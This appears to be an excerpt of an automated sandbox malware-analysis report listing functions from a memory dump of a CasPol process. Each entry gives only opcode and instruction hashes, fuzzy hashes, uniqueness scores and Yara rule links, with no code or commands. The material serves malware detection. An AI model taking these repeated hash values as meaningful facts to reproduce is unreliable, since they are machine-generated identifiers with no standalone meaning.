                                                                                  • Opcode ID: 0623aede6924b532ab564d1f13c193edcb511ccde7bf0d9c5b1c21743c69197a
                                                                                  • Instruction ID: 3e33dbbb63fcb3dfa2a6ace6eb5d4bff2931fb7c23f4fc62e157e9fc5efbdcfa
                                                                                  • Opcode Fuzzy Hash: 0623aede6924b532ab564d1f13c193edcb511ccde7bf0d9c5b1c21743c69197a
                                                                                  • Instruction Fuzzy Hash: 0DD1C935905328CFCBA5EF30D89868AB776BF49315F5081E9D80BA2354CB369E85CF16
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3DE6A5 Relevance: .3, Instructions: 263COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3dfaf84d503a1d5223af8c8becb011bc0759d71446c0c1388835427214d7a6c9
                                                                                  • Instruction ID: 96d7da0a27a165779692cee1a13f805ca73701b1949c7359ba0d558edbc7cdee
                                                                                  • Opcode Fuzzy Hash: 3dfaf84d503a1d5223af8c8becb011bc0759d71446c0c1388835427214d7a6c9
                                                                                  • Instruction Fuzzy Hash: F8D1D834905328CFCBA5EF30D8A8689B776BF49315F5081E9D80BA2354CB369E85CF16
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3DA156 Relevance: .3, Instructions: 263COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d91994b5d0ee043bccb348761225530f3fe16baeef325d37100e9d68680d1878
                                                                                  • Instruction ID: 2aecb73b2725c080c5ff4eeb2bc8ccf84eb363c3aeec5b8a42c087f65fbca8f4
                                                                                  • Opcode Fuzzy Hash: d91994b5d0ee043bccb348761225530f3fe16baeef325d37100e9d68680d1878
                                                                                  • Instruction Fuzzy Hash: FDA17A71E047098FDB40CFA9DA857AEBBF1BF48354F548229D405A7394EB749846CF82
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3DE6EC Relevance: .3, Instructions: 256COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 31a0d8ffd822d1de536d74af074b54326974c6fe175c095b7d64540c073119c6
                                                                                  • Instruction ID: 9d8c4e2e4ecf1eda1b1ea3e67ef0c0679457a75409f02a577e6c6ff6a92ec112
                                                                                  • Opcode Fuzzy Hash: 31a0d8ffd822d1de536d74af074b54326974c6fe175c095b7d64540c073119c6
                                                                                  • Instruction Fuzzy Hash: 7DD1C835905328CFCBA5EF30D898689B776BF49315F5081E9D80BA2354CB369E85CF16
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3DE733 Relevance: .2, Instructions: 249COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 496e79ea4f026f2522779cd3a91938d48b68ab0c56b6f3de2ca91a6fb7c5e768
                                                                                  • Instruction ID: e380d004c606a0a131a3e667358ca446f7c8e715339a83cf327db20ee31a6032
                                                                                  • Opcode Fuzzy Hash: 496e79ea4f026f2522779cd3a91938d48b68ab0c56b6f3de2ca91a6fb7c5e768
                                                                                  • Instruction Fuzzy Hash: 43D1B835905328CFCBA5EF30D898689B776BF49315F5081E9D80BA2354CB369E85CF16
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3DE77A Relevance: .2, Instructions: 242COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6e55e2981e94742a5ead98ce56887a3ed15fd2556fd89553f19d0a84d4ca255e
                                                                                  • Instruction ID: 37826ffe97266da5f96809f9ab27e1a7720a293eae0e6efed9101d71bfd5ed86
                                                                                  • Opcode Fuzzy Hash: 6e55e2981e94742a5ead98ce56887a3ed15fd2556fd89553f19d0a84d4ca255e
                                                                                  • Instruction Fuzzy Hash: 04C1A535905328CFCBA5EF20D89868AB776BF49315F5081E9D80BA2354CB369E85CF16
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3DE7C1 Relevance: .2, Instructions: 235COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 63ebb96765d9932e3a50183cfe02e6190304bdc6d7104a2c9da68d4314f0122e
                                                                                  • Instruction ID: dc7c862bc577e5771b45bdbe2dbed9bcbc1338c3931fddf4fefd2b5cefccd783
                                                                                  • Opcode Fuzzy Hash: 63ebb96765d9932e3a50183cfe02e6190304bdc6d7104a2c9da68d4314f0122e
                                                                                  • Instruction Fuzzy Hash: A3C1A635905328CFCBA5EF30D89868AB776BF49315F5081E9D80BA2354CB369E85CF16
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3DE808 Relevance: .2, Instructions: 228COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b243c31257d49528c7d9499a335de244357828ffa91b11ae7e3833d9ecfb3d91
                                                                                  • Instruction ID: 15cb86a149a632337af5b3cf0f58c97931dc81e922f7fde0f479cc06f7c2e724
                                                                                  • Opcode Fuzzy Hash: b243c31257d49528c7d9499a335de244357828ffa91b11ae7e3833d9ecfb3d91
                                                                                  • Instruction Fuzzy Hash: 50C1A635905328CFCBA5EF30D89868AB776BF49315F5081E9D80BA2354CB369E85CF16
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3DE84F Relevance: .2, Instructions: 221COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 32698d5b019c8a7c5e90038b632ba614e3cfd944ff17021fbdd6f6a21c472526
                                                                                  • Instruction ID: ec826bb4f02310026c8926c90accb60e1c671247b086a14afe6fc7aefcc5d716
                                                                                  • Opcode Fuzzy Hash: 32698d5b019c8a7c5e90038b632ba614e3cfd944ff17021fbdd6f6a21c472526
                                                                                  • Instruction Fuzzy Hash: 3BB1A435905328CFCBA5EF30D89868AB776BF49315F5081E9D80BA2354CB369E85CF16
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3DE896 Relevance: .2, Instructions: 214COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b3a880cd3cca96baacf557d3c5588f0b227887be3e59884e9a35d9890b724db7
                                                                                  • Instruction ID: 334b95b9ef3cc7b785267854f87a3b135f1458c7d3d3d7f6fed5008a226b2eeb
                                                                                  • Opcode Fuzzy Hash: b3a880cd3cca96baacf557d3c5588f0b227887be3e59884e9a35d9890b724db7
                                                                                  • Instruction Fuzzy Hash: 60B1A435905328CFCBA5EF30D89868AB776BF49315F5081E9D80BA2354CB369E85CF16
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3DE8DD Relevance: .2, Instructions: 205COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 848dec2cb9a9cb655274993977a03fb36f20f8767f353a5f074d55a02fb140db
                                                                                  • Instruction ID: 8d25ee1db448ffd6ddfd4a21f202d1804e71f500b901516868ed6341799815ef
                                                                                  • Opcode Fuzzy Hash: 848dec2cb9a9cb655274993977a03fb36f20f8767f353a5f074d55a02fb140db
                                                                                  • Instruction Fuzzy Hash: 89B1A535905328CFCBA5EF30D89868AB776BF49315F5081E9D80BA2354CB369E85CF16
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3DE91B Relevance: .2, Instructions: 200COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c58984effe3417a172d7a024c9f63c12c723c16a72f72bc80589532c6527a5e9
                                                                                  • Instruction ID: 06f1bfd0328b3ea3f7ea095e8c16f308efbf83d376e4541155bb32d8fad351b3
                                                                                  • Opcode Fuzzy Hash: c58984effe3417a172d7a024c9f63c12c723c16a72f72bc80589532c6527a5e9
                                                                                  • Instruction Fuzzy Hash: 7FA1A435905328CFCBA5EF30D89868AB776BF49315F5081E9D80BA2354CB369E85CF16
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3DE962 Relevance: .2, Instructions: 193COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1bacce1483719b7f1c50a27ea299eb88d1cdf1c86bd73ec0bf73c5ae7fd621c3
                                                                                  • Instruction ID: 3c0e321885c69031ba3d0ab9fc2baf253f46994a698c49dcbf243c4c2b891d4b
                                                                                  • Opcode Fuzzy Hash: 1bacce1483719b7f1c50a27ea299eb88d1cdf1c86bd73ec0bf73c5ae7fd621c3
                                                                                  • Instruction Fuzzy Hash: F9A1A535905328CFCBA5EF30D89868AB776BF49315F5081E9D80BA2354CB369E85CF16
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3DE9A9 Relevance: .2, Instructions: 186COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ddfd095f278ef95c227518b9998120a7e71d76a9b25ea05713cbcebf1a44b4f9
                                                                                  • Instruction ID: 93b97bb6622dcb6890bfa62efc865ef9aad673b83117ca4adb7cc058a20287d2
                                                                                  • Opcode Fuzzy Hash: ddfd095f278ef95c227518b9998120a7e71d76a9b25ea05713cbcebf1a44b4f9
                                                                                  • Instruction Fuzzy Hash: 3BA1B435905328CFCBA5EF20D89868AB776BF49315F5081E9D80BA2354CB369E85CF16
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3DE9F0 Relevance: .2, Instructions: 179COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 20e1eb0917233a8650587b3a64f15ab6a36076723dfc62414d74b2db847831fc
                                                                                  • Instruction ID: 6296577a9135fc08facf1b9041fd75f8cfdadf8f8a69d382c3e97e7e574f5d45
                                                                                  • Opcode Fuzzy Hash: 20e1eb0917233a8650587b3a64f15ab6a36076723dfc62414d74b2db847831fc
                                                                                  • Instruction Fuzzy Hash: A391B535905328CFCBA5EF30D89868AB776BF49315F5081E9D80BA2354CB369E85CF16
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3DEA37 Relevance: .2, Instructions: 172COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 83675f4736f320f99130183fde066fd6e5c60487a8e6fffeec3158baaaf333cd
                                                                                  • Instruction ID: 7b1c7328fb065a27694180560764039b58cb829f5aa78b3967eb0cc7af3d3854
                                                                                  • Opcode Fuzzy Hash: 83675f4736f320f99130183fde066fd6e5c60487a8e6fffeec3158baaaf333cd
                                                                                  • Instruction Fuzzy Hash: D991B435905328CFCBA5EF30D89868AB776BF49315F5081E9D80BA2354CB369E85CF16
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3DD7FC Relevance: .2, Instructions: 169COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 89f0ae6e2763ebc5dcfde2db76e59bd41c5f6d4abed57bf4f69a5532eaa567c6
                                                                                  • Instruction ID: 27d56f8eceb61a831f51b44b8fe1b171cc46b95869d1e2f67079db38ed7010fa
                                                                                  • Opcode Fuzzy Hash: 89f0ae6e2763ebc5dcfde2db76e59bd41c5f6d4abed57bf4f69a5532eaa567c6
                                                                                  • Instruction Fuzzy Hash: 0751F331B003208FCB44EBB4C4A876E77BAAF89259B65856CE106C7344CF35DC4ACB99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3DEA81 Relevance: .2, Instructions: 163COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d834f25ed19c22b234d502c2db0d72a0d15ea151f23324faa0116392bdbf3acf
                                                                                  • Instruction ID: 12b9363f9ddc9bed87a4f569d0c2b644cc12906e840bbab85fa8ec5e461a9a39
                                                                                  • Opcode Fuzzy Hash: d834f25ed19c22b234d502c2db0d72a0d15ea151f23324faa0116392bdbf3acf
                                                                                  • Instruction Fuzzy Hash: 4D81B535905328CFCBA5EF30D89868AB776BF49315F5081E9D80BA2354CB369E85CF16
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3DEABF Relevance: .2, Instructions: 156COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c23106b86393c5a8fdf2f60c4a2c41be4e35096e64ae1405b25344a765703a9a
                                                                                  • Instruction ID: 420639622d4fa2fc5ae498de2132d3ca1ba7d664a15c8d5af6d7e6f82b8ef4ca
                                                                                  • Opcode Fuzzy Hash: c23106b86393c5a8fdf2f60c4a2c41be4e35096e64ae1405b25344a765703a9a
                                                                                  • Instruction Fuzzy Hash: 7B81C535905328CFCBA5EF30D89868AB776BF49315F5081E9D80BA2354CB369E85CF16
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3DEAFD Relevance: .2, Instructions: 151COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: acc791e0c15320fe0f3c2dc0ac29d22f157bfbe773e295006f5f3db85219b3e7
                                                                                  • Instruction ID: 49790c581d50dbb3d7d4b5fa542ea41acffecd5ff8205bcec90917051adc8c9f
                                                                                  • Opcode Fuzzy Hash: acc791e0c15320fe0f3c2dc0ac29d22f157bfbe773e295006f5f3db85219b3e7
                                                                                  • Instruction Fuzzy Hash: BB71C335905328CFCBA5EF20D89868AB776BF49315F5081E9D80BA2344CB369E85CF16
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3DEB47 Relevance: .1, Instructions: 144COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: eb3d33518ae8404839fc25f06a0a40d8dff6eab2b35ed2baad5c7ffe5ac6aacd
                                                                                  • Instruction ID: 65a82b62bda41dac78e4324850d8ddfb9617dd148dc23fd0e96aad44b4b77936
                                                                                  • Opcode Fuzzy Hash: eb3d33518ae8404839fc25f06a0a40d8dff6eab2b35ed2baad5c7ffe5ac6aacd
                                                                                  • Instruction Fuzzy Hash: 9571B435905328CFCBA5EF20D89868AB776BF49315F5081E9D80BA3354CB369E85CF16
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3DEB91 Relevance: .1, Instructions: 137COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 23bc029ab014a3c97d79040cbae22adc9af8f8b0b25dfd503fefdceb619b4009
                                                                                  • Instruction ID: 9dafe527c5186ed8f26662b6cfb6530a3cee0a5763e48c7e6563ff979a4dec74
                                                                                  • Opcode Fuzzy Hash: 23bc029ab014a3c97d79040cbae22adc9af8f8b0b25dfd503fefdceb619b4009
                                                                                  • Instruction Fuzzy Hash: D961C435905328CFCBA5EF30D89868AB776BF49315F5081E9D80AA3344CB369E85CF16
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3DC1F4 Relevance: .1, Instructions: 135COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4f509489c61d69f49ca5e8d926cdd0a7178df9bd389b81907c2e239e4db183cb
                                                                                  • Instruction ID: e19a0e6d7a10fe8667e85c0e65ddd47a5aa18425d4803babe23247f44ec70777
                                                                                  • Opcode Fuzzy Hash: 4f509489c61d69f49ca5e8d926cdd0a7178df9bd389b81907c2e239e4db183cb
                                                                                  • Instruction Fuzzy Hash: 60513371D107188FDB54CFA9C884BADBBB1BF48710FA48529E819BB350D774A804CF96
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3DC5CC Relevance: .1, Instructions: 134COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 30fb497de8342840cb5397b64ac7c434b48d5db96c0374ca15a9aa0f8d287bc2
                                                                                  • Instruction ID: fe3fb0aedb60c25f59649d7e4973791e2ed9f8e382d35d6b39de3075a81ba5c5
                                                                                  • Opcode Fuzzy Hash: 30fb497de8342840cb5397b64ac7c434b48d5db96c0374ca15a9aa0f8d287bc2
                                                                                  • Instruction Fuzzy Hash: 0C5132B1D107188FDB54CFA9C884BADBBB1BF48710FA08129E819BB350D774A804CF96
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3DC74C Relevance: .1, Instructions: 134COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8e4a5ffa4e5e4c55e167601526c8b157493f60e3f2881d4c42686ec82c94be34
                                                                                  • Instruction ID: 8ffe3a7acf747fd92a05e38e350f43a4dedb85538b0f604746139c21a043eedc
                                                                                  • Opcode Fuzzy Hash: 8e4a5ffa4e5e4c55e167601526c8b157493f60e3f2881d4c42686ec82c94be34
                                                                                  • Instruction Fuzzy Hash: 32513FB1D107188FDB14CFA9C885BADBBB1BF48300F608229E819BB350D774A844CF96
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3DEBDB Relevance: .1, Instructions: 130COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 012f24c1299991fa98c6f506d95263d939f5a815bb02cb24918e92d178840a7e
                                                                                  • Instruction ID: 0b26889c13fbf40fb947fb72ea2d366ebfdc7e0a0cfa9d63499b8881e665ea17
                                                                                  • Opcode Fuzzy Hash: 012f24c1299991fa98c6f506d95263d939f5a815bb02cb24918e92d178840a7e
                                                                                  • Instruction Fuzzy Hash: 00619535905328CFCBA5EF30D89868AB776BF49315F5081E9D80AA3354CB369E85CF16
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3D2080 Relevance: .1, Instructions: 129COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e78ee20513e4ea07a76fd19c9dd964516b0a7d91376ce6aaa2390e948892a84a
                                                                                  • Instruction ID: 397582a9ac3c578c3509ee59cb554a6ba560f3f291347c929c22baabc835cdf9
                                                                                  • Opcode Fuzzy Hash: e78ee20513e4ea07a76fd19c9dd964516b0a7d91376ce6aaa2390e948892a84a
                                                                                  • Instruction Fuzzy Hash: 0C412635A042468FD741CF68D982A6EBBB6FB85310F91C662D609CB391D730DD42CB92
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3D6670 Relevance: .1, Instructions: 125COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5a6662f02b3ce960043fb8846210a84bd3a985f70fde7672987fdc242f3d477f
                                                                                  • Instruction ID: 38d7bd6887ad8e598c884c400591a113ab814277f174c32b70dbb83ce86b8fb4
                                                                                  • Opcode Fuzzy Hash: 5a6662f02b3ce960043fb8846210a84bd3a985f70fde7672987fdc242f3d477f
                                                                                  • Instruction Fuzzy Hash: 71513F71D00A4C8FDB10CF99C984BDEFBF5AF48304F208159E019AB260DB75A94ACF92
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3DEC25 Relevance: .1, Instructions: 123COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
